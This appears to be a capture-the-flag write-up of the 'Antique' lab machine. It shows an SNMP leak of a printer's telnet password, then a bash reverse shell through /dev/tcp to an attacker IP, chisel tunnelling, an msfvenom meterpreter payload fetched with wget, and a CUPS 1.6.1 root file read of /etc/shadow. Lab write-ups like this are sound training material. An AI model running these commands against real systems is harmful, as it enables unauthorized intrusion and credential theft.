I"is<h2 id="summary">Summary</h2>

<p>10.129.95.245</p>

<p>Antique starts by finding a listening telnet server that is password protected, and a snmp service that leaks a hex-encoded password for the telnet server. Once logged in to the telnet server we can execute os commands to get a reverse shell. Enumerating the box shows CUPS 1.6.1 is running on localhost port 631, we use chisel to expose the service to our attacker. With a bit of searching we find a metasploit post module for root file read and manage to recover the flag.</p>

<h2 id="initial-recon">Initial Recon</h2>

<p>We’ll start with a quick Nmap TCP scan on all ports.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>nmap <span class="nt">-v</span> <span class="nt">-p-</span> <span class="nt">-oN</span> allports.nmap 10.129.95.245 <span class="nt">--min-rate</span> 10000

Nmap scan report <span class="k">for </span>10.129.95.245
Host is up <span class="o">(</span>0.013s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65529 closed tcp ports <span class="o">(</span>reset<span class="o">)</span>
PORT      STATE    SERVICE
23/tcp    open     telnet
</code></pre></div></div>

<p><img src="assets/antique_screenshots/nmap_tcp.png" alt="nmap_tcp" /></p>

<p>The TCP scan only found telnet on port 23, so I decided to run a UDP scan as well while I looked at telnet.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-v</span> <span class="nt">-sU</span> <span class="nt">-p-</span> <span class="nt">-oN</span> udp_allports.nmap <span class="nt">--min-rate</span> 10000 10.129.95.245

Nmap scan report <span class="k">for </span>10.129.95.245
Host is up <span class="o">(</span>0.027s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65456 open|filtered udp ports <span class="o">(</span>no-response<span class="o">)</span>, 78 closed udp ports <span class="o">(</span>port-unreach<span class="o">)</span>
PORT    STATE SERVICE
161/udp open  snmp
</code></pre></div></div>

<p><img src="assets/antique_screenshots/nmap_udp.png" alt="nmap_udp" /></p>

<p>The UDP scan found snmp open, let’s run snmpwalk.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>snmpwalk <span class="nt">-v</span> 1 <span class="nt">-c</span> public 10.129.95.245 1

SNMPv2-SMI::mib-2 <span class="o">=</span> STRING: <span class="s2">"HTB Printer"</span>
SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 <span class="o">=</span> BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
SNMPv2-SMI::enterprises.11.2.3.9.1.2.1.0 <span class="o">=</span> No more variables left <span class="k">in </span>this MIB View <span class="o">(</span>It is past the end of the MIB tree<span class="o">)</span>
</code></pre></div></div>

<p>Let’s look in to telnet.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>telnet 10.129.95.245 23

Trying 10.129.95.245...
Connected to 10.129.95.245.
Escape character is <span class="s1">'^]'</span><span class="nb">.</span>

HP JetDirect


Password:
Invalid password
Connection closed by foreign host.
</code></pre></div></div>

<p>The usual default passwords of “admin” don’t work, so let’s google <code class="language-plaintext highlighter-rouge">HP JetDirect password</code></p>

<p><img src="assets/antique_screenshots/google_for_password.png" alt="google_for_password" /></p>

<p>The top result takes us to [Iron Geek - Hacking Network Printers])(<a href="http://www.irongeek.com/i.php?page=security/networkprinterhacking">http://www.irongeek.com/i.php?page=security/networkprinterhacking</a>). After skimming the page we see a section on getting the password from SNMP.</p>

<p><img src="assets/antique_screenshots/irongeek_printer_password.png" alt="irongeek_printer_password" /></p>

<p>Using an <a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html">online hex decoder</a> to decode the hex string we found with snmpwalk gets us a password of <code class="language-plaintext highlighter-rouge">P@ssw0rd@123!!123</code></p>

<p><img src="assets/antique_screenshots/hex_decoder.png" alt="hex_decoder" /></p>

<p>Let’s try using the password to log in to the telnet server.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>telnet 10.129.95.245 23
Trying 10.129.95.245...
Connected to 10.129.95.245.
Escape character is <span class="s1">'^]'</span><span class="nb">.</span>

HP JetDirect


Password: P@ssw0rd@123!!123

Please <span class="nb">type</span> <span class="s2">"?"</span> <span class="k">for </span>HELP
<span class="o">&gt;</span>
</code></pre></div></div>

<p>We get logged in and can send <code class="language-plaintext highlighter-rouge">?</code> to list commands.</p>

<p><img src="assets/antique_screenshots/telnet_login.png" alt="telnet_login" /></p>

<p>The <code class="language-plaintext highlighter-rouge">exec</code> command looks good, let’s try and get a reverse shell.</p>

<p>We’ll set up a netcat listener on our attacker.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 9001
</code></pre></div></div>

<p>Then in the telnet session, we’ll use <code class="language-plaintext highlighter-rouge">exec</code> to call a bash reverse shell</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span> <span class="nb">exec</span> /bin/bash <span class="nt">-c</span> <span class="s2">"/bin/bash -i &gt;&amp; /dev/tcp/10.10.14.54/9001 0&gt;&amp;1"</span>
</code></pre></div></div>

<p>And we catch the reverse shell on our netcat listener. The box has python3, so we can use the python pty trick to upgrade our shell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Connection from 10.129.95.245:48196
bash: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>859<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
bash: no job control <span class="k">in </span>this shell
lp@antique:~<span class="err">$</span>
lp@antique:~<span class="nv">$ </span>which python
which python
lp@antique:~<span class="nv">$ </span>which python3
which python3
/usr/bin/python3
lp@antique:~<span class="nv">$ </span>python3 <span class="nt">-c</span> <span class="s2">"import pty;pty.spawn('/bin/bash')"</span>
python3 <span class="nt">-c</span> <span class="s2">"import pty;pty.spawn('/bin/bash')"</span>
lp@antique:~<span class="nv">$ </span>^Z
<span class="o">[</span>1]  + 20817 suspended  nc <span class="nt">-lvnp</span> 9001
tuz@hackbox <span class="o">[</span>148] % <span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span> <span class="nb">fg</span>
<span class="o">[</span>1]  + 20817 continued  nc <span class="nt">-lvnp</span> 9001

lp@antique:~<span class="nv">$ </span><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
lp@antique:~<span class="err">$</span>
</code></pre></div></div>

<p><img src="assets/antique_screenshots/user_proof.png" alt="user_proof" /></p>

<h2 id="privesc">PrivEsc</h2>

<p>Running netstat show’s the box is listening on localhost port 631.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>netstat <span class="nt">-antop</span>

<span class="o">(</span>Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.<span class="o">)</span>
Active Internet connections <span class="o">(</span>servers and established<span class="o">)</span>
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
tcp        0      0 0.0.0.0:23              0.0.0.0:<span class="k">*</span>               LISTEN      867/python3          off <span class="o">(</span>0.00/0/0<span class="o">)</span>
tcp        0      0 127.0.0.1:631           0.0.0.0:<span class="k">*</span>               LISTEN      -                    off <span class="o">(</span>0.00/0/0<span class="o">)</span>
tcp        0      2 10.129.183.238:48326    10.10.14.54:9001        ESTABLISHED 1817/bash            on <span class="o">(</span>0.20/0/0<span class="o">)</span>
tcp        0      0 127.0.0.1:33868         127.0.0.1:631           TIME_WAIT   -                    timewait <span class="o">(</span>24.70/0/0<span class="o">)</span>
tcp       25      0 10.129.183.238:23       10.10.14.54:60892       CLOSE_WAIT  867/python3          off <span class="o">(</span>0.00/0/0<span class="o">)</span>
tcp6       0      0 ::1:631                 :::<span class="k">*</span>                    LISTEN      -                    off <span class="o">(</span>0.00/0/0<span class="o">)</span>
</code></pre></div></div>

<p>Connecting to the port with curl shows a CUPS page.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://localhost:631

<span class="cp">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&gt;</span>
<span class="nt">&lt;HTML&gt;</span>
<span class="nt">&lt;HEAD&gt;</span>
 <span class="nt">&lt;META</span> <span class="na">HTTP-EQUIV=</span><span class="s">"Content-Type"</span> <span class="na">CONTENT=</span><span class="s">"text/html; charset=utf-8"</span><span class="nt">&gt;</span>
 <span class="nt">&lt;TITLE&gt;</span>Home - CUPS 1.6.1<span class="nt">&lt;/TITLE&gt;</span>
 <span class="nt">&lt;LINK</span> <span class="na">REL=</span><span class="s">"STYLESHEET"</span> <span class="na">TYPE=</span><span class="s">"text/css"</span> <span class="na">HREF=</span><span class="s">"/cups.css"</span><span class="nt">&gt;</span>
 <span class="nt">&lt;LINK</span> <span class="na">REL=</span><span class="s">"SHORTCUT ICON"</span> <span class="na">HREF=</span><span class="s">"/images/cups-icon.png"</span> <span class="na">TYPE=</span><span class="s">"image/png"</span><span class="nt">&gt;</span>
<span class="nt">&lt;/HEAD&gt;</span>
<span class="nt">&lt;BODY&gt;</span>
<span class="nt">&lt;TABLE</span> <span class="na">CLASS=</span><span class="s">"page"</span> <span class="na">SUMMARY=</span><span class="s">"{title}"</span><span class="nt">&gt;</span>
<span class="nt">&lt;TR&gt;&lt;TD</span> <span class="na">CLASS=</span><span class="s">"body"</span><span class="nt">&gt;</span>
<span class="nt">&lt;TABLE</span> <span class="na">BORDER=</span><span class="s">"0"</span> <span class="na">CELLPADDING=</span><span class="s">"0"</span> <span class="na">CELLSPACING=</span><span class="s">"0"</span> <span class="na">SUMMARY=</span><span class="s">""</span><span class="nt">&gt;</span>
<span class="nt">&lt;TR</span> <span class="na">HEIGHT=</span><span class="s">"36"</span><span class="nt">&gt;</span>
<span class="nt">&lt;TD&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"http://www.cups.org/"</span> <span class="na">TARGET=</span><span class="s">"_blank"</span><span class="nt">&gt;&lt;IMG</span>
<span class="na">SRC=</span><span class="s">"/images/left.gif"</span> <span class="na">WIDTH=</span><span class="s">"64"</span> <span class="na">HEIGHT=</span><span class="s">"36"</span> <span class="na">BORDER=</span><span class="s">"0"</span> <span class="na">ALT=</span><span class="s">""</span><span class="nt">&gt;&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD</span> <span class="na">CLASS=</span><span class="s">"sel"</span><span class="nt">&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"/"</span><span class="nt">&gt;</span><span class="ni">&amp;nbsp;&amp;nbsp;</span>Home<span class="ni">&amp;nbsp;&amp;nbsp;</span><span class="nt">&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD</span> <span class="na">CLASS=</span><span class="s">"unsel"</span><span class="nt">&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"/admin"</span><span class="nt">&gt;</span><span class="ni">&amp;nbsp;&amp;nbsp;</span>Administration<span class="ni">&amp;nbsp;&amp;nbsp;</span><span class="nt">&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD</span> <span class="na">CLASS=</span><span class="s">"unsel"</span><span class="nt">&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"/classes/"</span><span class="nt">&gt;</span><span class="ni">&amp;nbsp;&amp;nbsp;</span>Classes<span class="ni">&amp;nbsp;&amp;nbsp;</span><span class="nt">&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD</span> <span class="na">CLASS=</span><span class="s">"unsel"</span><span class="nt">&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"/help/"</span><span class="nt">&gt;</span><span class="ni">&amp;nbsp;&amp;nbsp;</span>Online<span class="ni">&amp;nbsp;</span>Help<span class="ni">&amp;nbsp;&amp;nbsp;</span><span class="nt">&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD</span> <span class="na">CLASS=</span><span class="s">"unsel"</span><span class="nt">&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"/jobs/"</span><span class="nt">&gt;</span><span class="ni">&amp;nbsp;&amp;nbsp;</span>Jobs<span class="ni">&amp;nbsp;&amp;nbsp;</span><span class="nt">&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD</span> <span class="na">CLASS=</span><span class="s">"unsel"</span><span class="nt">&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"/printers/"</span><span class="nt">&gt;</span><span class="ni">&amp;nbsp;&amp;nbsp;</span>Printers<span class="ni">&amp;nbsp;&amp;nbsp;</span><span class="nt">&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD</span> <span class="na">CLASS=</span><span class="s">"unsel"</span> <span class="na">WIDTH=</span><span class="s">"100%"</span><span class="nt">&gt;&lt;FORM</span> <span class="na">ACTION=</span><span class="s">"/help/"</span> <span class="na">METHOD=</span><span class="s">"GET"</span><span class="nt">&gt;&lt;INPUT</span>
<span class="na">TYPE=</span><span class="s">"SEARCH"</span> <span class="na">NAME=</span><span class="s">"QUERY"</span> <span class="na">SIZE=</span><span class="s">"20"</span> <span class="na">PLACEHOLDER=</span><span class="s">"Search Help"</span>
<span class="na">AUTOSAVE=</span><span class="s">"org.cups.help"</span> <span class="na">RESULTS=</span><span class="s">"20"</span><span class="nt">&gt;&lt;/FORM&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;TD&gt;&lt;IMG</span> <span class="na">SRC=</span><span class="s">"/images/right.gif"</span> <span class="na">WIDTH=</span><span class="s">"4"</span> <span class="na">HEIGHT=</span><span class="s">"36"</span> <span class="na">ALT=</span><span class="s">""</span><span class="nt">&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;/TR&gt;</span>
<span class="nt">&lt;/TABLE&gt;</span>

<span class="nt">&lt;TABLE</span> <span class="na">CLASS=</span><span class="s">"indent"</span> <span class="na">SUMMARY=</span><span class="s">""</span><span class="nt">&gt;</span>
<span class="nt">&lt;TR&gt;&lt;TD</span> <span class="na">STYLE=</span><span class="s">"padding-right: 20px;"</span><span class="nt">&gt;</span>

<span class="nt">&lt;H1&gt;</span>CUPS 1.6.1<span class="nt">&lt;/H1&gt;</span>

<span class="nt">&lt;P&gt;</span>CUPS is the standards-based, open source printing system developed by
<span class="nt">&lt;A</span> <span class="na">HREF=</span><span class="s">"http://www.apple.com/"</span><span class="nt">&gt;</span>Apple Inc.<span class="nt">&lt;/A&gt;</span> for OS<span class="nt">&lt;SUP&gt;</span><span class="ni">&amp;reg;</span><span class="nt">&lt;/SUP&gt;</span> X and
other UNIX<span class="nt">&lt;SUP&gt;</span><span class="ni">&amp;reg;</span><span class="nt">&lt;/SUP&gt;</span>-like operating systems.<span class="nt">&lt;/P&gt;</span>

<span class="nt">&lt;/TD&gt;</span>
<span class="nt">&lt;TD&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"http://www.cups.org/"</span><span class="nt">&gt;&lt;IMG</span> <span class="na">SRC=</span><span class="s">"images/cups-icon.png"</span> <span class="na">WIDTH=</span><span class="s">"128"</span>
<span class="na">HEIGHT=</span><span class="s">"128"</span> <span class="na">ALT=</span><span class="s">"CUPS"</span><span class="nt">&gt;&lt;/A&gt;&lt;/TD&gt;</span>
<span class="nt">&lt;/TR&gt;</span>
<span class="nt">&lt;/TABLE&gt;</span>

<span class="nt">&lt;TABLE</span> <span class="na">CLASS=</span><span class="s">"indent"</span> <span class="na">SUMMARY=</span><span class="s">""</span><span class="nt">&gt;</span>
<span class="nt">&lt;TR&gt;&lt;TD</span> <span class="na">VALIGN=</span><span class="s">"top"</span> <span class="na">STYLE=</span><span class="s">"border-right: dotted thin #cccccc; padding-right: 20px;"</span><span class="nt">&gt;</span>

<span class="nt">&lt;H2&gt;</span>CUPS for Users<span class="nt">&lt;/H2&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/overview.html"</span><span class="nt">&gt;</span>Overview of CUPS<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/options.html"</span><span class="nt">&gt;</span>Command-Line Printing and Options<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/whatsnew.html"</span><span class="nt">&gt;</span>What's New in CUPS 1.6<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"http://www.cups.org/newsgroups.php?gcups.general"</span><span class="nt">&gt;</span>User Forum<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;/TD&gt;&lt;TD</span> <span class="na">VALIGN=</span><span class="s">"top"</span> <span class="na">STYLE=</span><span class="s">"border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;"</span><span class="nt">&gt;</span>

<span class="nt">&lt;H2&gt;</span>CUPS for Administrators<span class="nt">&lt;/H2&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"admin"</span><span class="nt">&gt;</span>Adding Printers and Classes<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/policies.html"</span><span class="nt">&gt;</span>Managing Operation Policies<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/accounting.html"</span><span class="nt">&gt;</span>Printer Accounting Basics<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/security.html"</span><span class="nt">&gt;</span>Server Security<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/kerberos.html"</span><span class="nt">&gt;</span>Using Kerberos Authentication<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/network.html"</span><span class="nt">&gt;</span>Using Network Printers<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/ref-cupsd-conf.html"</span><span class="nt">&gt;</span>cupsd.conf Reference<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"http://www.cups.org/ppd.php"</span><span class="nt">&gt;</span>Find Printer Drivers<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;/TD&gt;&lt;TD</span> <span class="na">VALIGN=</span><span class="s">"top"</span> <span class="na">STYLE=</span><span class="s">"padding-left: 20px;"</span><span class="nt">&gt;</span>

<span class="nt">&lt;H2&gt;</span>CUPS for Developers<span class="nt">&lt;/H2&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/api-overview.html"</span><span class="nt">&gt;</span>Introduction to CUPS Programming<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/api-cups.html"</span><span class="nt">&gt;</span>CUPS API<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/api-filter.html"</span><span class="nt">&gt;</span>Filter and Backend Programming<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/api-httpipp.html"</span><span class="nt">&gt;</span>HTTP and IPP APIs<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/api-ppd.html"</span><span class="nt">&gt;</span>PPD API<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/api-raster.html"</span><span class="nt">&gt;</span>Raster API<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"help/ref-ppdcfile.html"</span><span class="nt">&gt;</span>PPD Compiler Driver Information File Reference<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;P&gt;&lt;A</span> <span class="na">HREF=</span><span class="s">"http://www.cups.org/newsgroups.php?gcups.development"</span><span class="nt">&gt;</span>Developer Forum<span class="nt">&lt;/A&gt;&lt;/P&gt;</span>

<span class="nt">&lt;/TD&gt;&lt;/TR&gt;</span>
<span class="nt">&lt;/TABLE&gt;</span>

<span class="nt">&lt;/TD&gt;&lt;/TR&gt;</span>
<span class="nt">&lt;TR&gt;&lt;TD&gt;</span><span class="ni">&amp;nbsp;</span><span class="nt">&lt;/TD&gt;&lt;/TR&gt;</span>
<span class="nt">&lt;TR&gt;&lt;TD</span> <span class="na">CLASS=</span><span class="s">"trailer"</span><span class="nt">&gt;</span>CUPS and the CUPS logo are trademarks of
<span class="nt">&lt;A</span> <span class="na">HREF=</span><span class="s">"http://www.apple.com"</span><span class="nt">&gt;</span>Apple Inc.<span class="nt">&lt;/A&gt;</span> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.<span class="nt">&lt;/TD&gt;&lt;/TR&gt;</span>
<span class="nt">&lt;/TABLE&gt;</span>
<span class="nt">&lt;/BODY&gt;</span>
<span class="nt">&lt;/HTML&gt;</span>
</code></pre></div></div>

<p>Searching for <code class="language-plaintext highlighter-rouge">CUPS 1.6.1 exploits</code> brings up 2 interesting possiblitys. <a href="https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/">CUPS 1.6.1 Root File Read</a> is an arbitarry root file read, <a href="https://www.exploit-db.com/exploits/41233">CUPS &lt; 2.0.3 - Remote Command Execution</a> is a RCE and requires a printer to be added in CUPS.</p>

<p>We can use <a href="https://github.com/jpillora/chisel">chisel</a> to <a href="https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html">reverse port forward</a> the CUPS service on the victims port 631 to our attackers local port.
First we need to download <a href="https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_amd64.gz">chisel linux amd64</a> to our attacker box.
Extract the archive, then host the file on our attacker.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_amd64.gz <span class="o">&amp;&amp;</span> <span class="nb">gunzip</span> <span class="nt">-d</span> chisel_1.7.6_linux_amd64.gz <span class="o">&amp;&amp;</span> python3 <span class="nt">-m</span> http.server
</code></pre></div></div>

<p>Then upload chisel to the victim, then chmod it as executable.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget <span class="nt">-O</span> chisel http://10.10.14.54:8080/chisel_1.7.6_linux_amd64 <span class="o">&amp;&amp;</span> <span class="nb">chmod</span> +x ./chisel
</code></pre></div></div>

<p>Now we run chisel as a reverse tunnelling enabled server on our attacker.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./chisel_1.7.6_linux_amd64 server <span class="nt">-p</span> 8081 <span class="nt">--reverse</span> &amp;
</code></pre></div></div>

<p>And then run chisel as a client on our victim.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./chisel client 10.10.14.54:8081 R:63131:127.0.0.1:631
</code></pre></div></div>

<p>We can now connect to the CUPS web service on our attacker box, on port 63131</p>

<p><img src="assets/antique_screenshots/cups_localhost.png" alt="cups_localhost" /></p>

<p>The RCE requires a printer be set up, and in this case there is no printer. No win there.</p>

<p><img src="assets/antique_screenshots/cups_no_printer.png" alt="cups_no_printer" /></p>

<p><a href="https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/">CUPS 1.6.1 Root File Read</a>.
We can exploit this manualy or with a meterpreter shell.</p>

<h3 id="manual-cups-root-file-read">Manual CUPS root file read</h3>

<p>The manual method is worth highlighting, as more offten than not we can manualy carry out the same exploit as metasploit, sometimes with a bit of python scripting. This is usefull for situations where meterpreter is unavalible, or in the OSCP exam where its use is limited.</p>

<p>Reading the source for the metasploit module shows how to exploit the service manualy.</p>

<p>First we ensure our victim is in the lpadmin group.</p>

<p><img src="assets/antique_screenshots/user_id.png" alt="user_id" /></p>

<p>Then we use the <code class="language-plaintext highlighter-rouge">cupsctl</code> utility to set the file we want to read.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cupsctl <span class="nv">ErrorLog</span><span class="o">=</span>/etc/shadow
</code></pre></div></div>

<p>Now we navigate to the <code class="language-plaintext highlighter-rouge">error_log</code> and we get the file.</p>

<p><img src="assets/antique_screenshots/error_log.png" alt="error_log" /></p>

<h3 id="metasploit-root-file-read">Metasploit root file read</h3>

<p>The benifit of the metasploit route is not having to tunnel the CUPS service, as the module runs in the current meterpreter session.</p>

<p>Create the meterpreter shell with msfvenom.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom <span class="nt">-p</span> linux/x64/meterpreter/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.54 <span class="nv">LPORT</span><span class="o">=</span>4444 <span class="nt">-f</span> elf <span class="o">&gt;</span> met
</code></pre></div></div>

<p>Locally host then upload the meterpreter payload to the victim.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>python <span class="nt">-m</span> http.server 80
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://10.10.14.54/met
</code></pre></div></div>

<p>Start a metasploit multihandler.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfconsole <span class="nt">-q</span> <span class="nt">-x</span> <span class="s2">"use exploit/multi/handler; set paylaod linux/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4444; run -j"</span>
</code></pre></div></div>

<p>Run the meterpreter payload on the victim.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">chmod</span> +x met<span class="p">;</span> ./met &amp;
</code></pre></div></div>

<p>We get a meterpreter session. Now we can use the CUPS root file read post module.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use post/multi/escalate/cups_root_file_read<span class="p">;</span> <span class="nb">set </span>session 1<span class="p">;</span> run
</code></pre></div></div>

<p><img src="assets/antique_screenshots/cups_root_file_read.png" alt="cups_root_file_read" /></p>

<p><img src="assets/antique_screenshots/root_hash.png" alt="root_hash" /></p>

<p>This gets us the /etc/shadow file. We can also change the FILE variable to /root/root.txt to get the flag.</p>

<p><img src="assets/antique_screenshots/root_flag.png" alt="root_flag" /></p>

<p>We can try and crack the root password to then su as root, but that’s all we can do as there’s no ssh server running to steal keys for and we don’t have the ability to write as root.</p>

<p><img src="assets/antique_screenshots/hashcat_fail.png" alt="hashcat_fail" /></p>
:ET